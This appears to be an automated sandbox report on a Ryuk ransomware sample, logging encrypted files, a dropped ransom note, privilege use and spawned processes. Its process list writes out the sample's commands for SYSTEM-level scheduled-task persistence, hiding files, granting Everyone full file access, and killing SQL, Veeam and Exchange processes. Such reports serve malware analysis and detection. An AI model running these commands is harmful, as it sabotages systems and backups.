File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.sun.el_2.2.0.v201303151357.jar.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\Fonts\private\BKANT.TTF.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\RADIAL\THMBNAIL.PNG.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\compare.png.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files\Java\jre1.8.0_66\LICENSE.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files\Microsoft Office\PackageManifests\AppXManifest.90160000-00E2-0409-1000-0000000FF1CE.xml.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\images\themes\dark\icons_retina.png.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\ko.txt.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\Certificates_R.aapp.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_sendforsignature_18.svg.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\fr-ma\ui-strings.js.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\eu-es\ui-strings.js.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\accessibility.properties.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\SKY\SKY.ELM.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\images\s_thumbnailview_18.svg.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\lib\dsn.jar.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\WidevineCdm\manifest.json.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\VisioProR_Trial-ppd.xrm-ms.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\ja-jp\ui-strings.js.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themeless\example_icons2x.png.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\images\themes\dark\example_icons.png.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\RyukReadMe.txt C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File created C:\Windows\hrmlog1 C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\sc.exe N/A
N/A N/A C:\Windows\SysWOW64\sc.exe N/A
N/A N/A C:\Windows\SysWOW64\sc.exe N/A
N/A N/A C:\Windows\SysWOW64\sc.exe N/A

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000_Classes\Local Settings C:\Windows\SysWOW64\cmd.exe N/A

Opens file in notepad (likely ransom note)

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\NOTEPAD.EXE N/A

Runs net.exe

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4244 wrote to memory of 364 N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe C:\Windows\SysWOW64\cmd.exe
PID 4244 wrote to memory of 364 N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe C:\Windows\SysWOW64\cmd.exe
PID 4244 wrote to memory of 364 N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe C:\Windows\SysWOW64\cmd.exe
PID 364 wrote to memory of 664 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 364 wrote to memory of 664 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 364 wrote to memory of 664 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 4244 wrote to memory of 4156 N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe C:\Windows\SysWOW64\cmd.exe
PID 4244 wrote to memory of 4156 N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe C:\Windows\SysWOW64\cmd.exe
PID 4244 wrote to memory of 4156 N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe C:\Windows\SysWOW64\cmd.exe
PID 4244 wrote to memory of 2308 N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe C:\Windows\SysWOW64\cmd.exe
PID 4244 wrote to memory of 2308 N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe C:\Windows\SysWOW64\cmd.exe
PID 4244 wrote to memory of 2308 N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe C:\Windows\SysWOW64\cmd.exe
PID 4244 wrote to memory of 5080 N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe C:\Windows\SysWOW64\cmd.exe
PID 4244 wrote to memory of 5080 N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe C:\Windows\SysWOW64\cmd.exe
PID 4244 wrote to memory of 5080 N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe C:\Windows\SysWOW64\cmd.exe
PID 5080 wrote to memory of 3024 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 5080 wrote to memory of 3024 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 5080 wrote to memory of 3024 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 4244 wrote to memory of 1072 N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe C:\Windows\SysWOW64\cmd.exe
PID 4244 wrote to memory of 1072 N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe C:\Windows\SysWOW64\cmd.exe
PID 4244 wrote to memory of 1072 N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe C:\Windows\SysWOW64\cmd.exe
PID 1072 wrote to memory of 4008 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 1072 wrote to memory of 4008 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 1072 wrote to memory of 4008 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 4244 wrote to memory of 3976 N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe C:\Windows\SysWOW64\cmd.exe
PID 4244 wrote to memory of 3976 N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe C:\Windows\SysWOW64\cmd.exe
PID 4244 wrote to memory of 3976 N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe C:\Windows\SysWOW64\cmd.exe
PID 3976 wrote to memory of 3776 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 3976 wrote to memory of 3776 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 3976 wrote to memory of 3776 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 4244 wrote to memory of 220 N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe C:\Windows\SysWOW64\cmd.exe
PID 4244 wrote to memory of 220 N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe C:\Windows\SysWOW64\cmd.exe
PID 4244 wrote to memory of 220 N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe C:\Windows\SysWOW64\cmd.exe
PID 220 wrote to memory of 224 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 220 wrote to memory of 224 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 220 wrote to memory of 224 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 4244 wrote to memory of 4308 N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe C:\Windows\SysWOW64\cmd.exe
PID 4244 wrote to memory of 4308 N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe C:\Windows\SysWOW64\cmd.exe
PID 4244 wrote to memory of 4308 N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe C:\Windows\SysWOW64\cmd.exe
PID 4308 wrote to memory of 3484 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 4308 wrote to memory of 3484 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 4308 wrote to memory of 3484 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 4244 wrote to memory of 4500 N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe C:\Windows\SysWOW64\cmd.exe
PID 4244 wrote to memory of 4500 N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe C:\Windows\SysWOW64\cmd.exe
PID 4244 wrote to memory of 4500 N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe C:\Windows\SysWOW64\cmd.exe
PID 4500 wrote to memory of 4736 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 4500 wrote to memory of 4736 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 4500 wrote to memory of 4736 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 4244 wrote to memory of 1728 N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe C:\Windows\SysWOW64\cmd.exe
PID 4244 wrote to memory of 1728 N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe C:\Windows\SysWOW64\cmd.exe
PID 4244 wrote to memory of 1728 N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe C:\Windows\SysWOW64\cmd.exe
PID 1728 wrote to memory of 4420 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 1728 wrote to memory of 4420 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 1728 wrote to memory of 4420 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 4244 wrote to memory of 4248 N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe C:\Windows\SysWOW64\cmd.exe
PID 4244 wrote to memory of 4248 N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe C:\Windows\SysWOW64\cmd.exe
PID 4244 wrote to memory of 4248 N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe C:\Windows\SysWOW64\cmd.exe
PID 4248 wrote to memory of 4212 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 4248 wrote to memory of 4212 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 4248 wrote to memory of 4212 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 4248 wrote to memory of 780 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 4248 wrote to memory of 780 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 4248 wrote to memory of 780 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 4244 wrote to memory of 872 N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe C:\Windows\SysWOW64\cmd.exe

Uses Volume Shadow Copy service COM API

ransomware

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe

"C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /RU SYSTEM /RL HIGHEST /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /RU SYSTEM /RL HIGHEST /F

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c copy C:\ProgramData\ryuk.exe "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c copy C:\ProgramData\ryuk.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /F

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c attrib +h +s "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"

C:\Windows\SysWOW64\attrib.exe

attrib +h +s "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN ryk /TR "C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe" /RU SYSTEM /RL HIGHEST /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /SC ONLOGON /TN ryk /TR "C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe" /RU SYSTEM /RL HIGHEST /F

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RyuK /TR "C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe" /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /SC ONLOGON /TN RyuK /TR "C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe" /F

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c attrib +h +s ryuk.exe

C:\Windows\SysWOW64\attrib.exe

attrib +h +s ryuk.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c attrib +h +s C:\ProgramData\ryuk.exe

C:\Windows\SysWOW64\attrib.exe

attrib +h +s C:\ProgramData\ryuk.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c start cmd.exe /c icacls * /grant Everyone:(OI)(CI)F /T /C /Q

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c icacls * /grant Everyone:(OI)(CI)F /T /C /Q

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c start cmd.exe /c taskkill /t /f /im sql* && taskkill /f /t /im veeam* && taskkill /F /T /IM MSExchange* && taskkill /F /T /IM Microsoft.Exchange* && taskkill /F /T /IM pvx* && taskkill /F /T /IM dbsrv* && exit

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c taskkill /t /f /im sql*

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /t /im veeam*

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\icacls.exe

icacls * /grant Everyone:(OI)(CI)F /T /C /Q

C:\Windows\SysWOW64\reg.exe

reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\taskkill.exe

taskkill /t /f /im sql*

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Copy hrmlog1 C:\ProgramData\hrmlog1

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Copy hrmlog2 C:\ProgramData\hrmlog2

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Copy RYUKID C:\ProgramData\RYUKID

C:\Windows\SysWOW64\cmd.exe

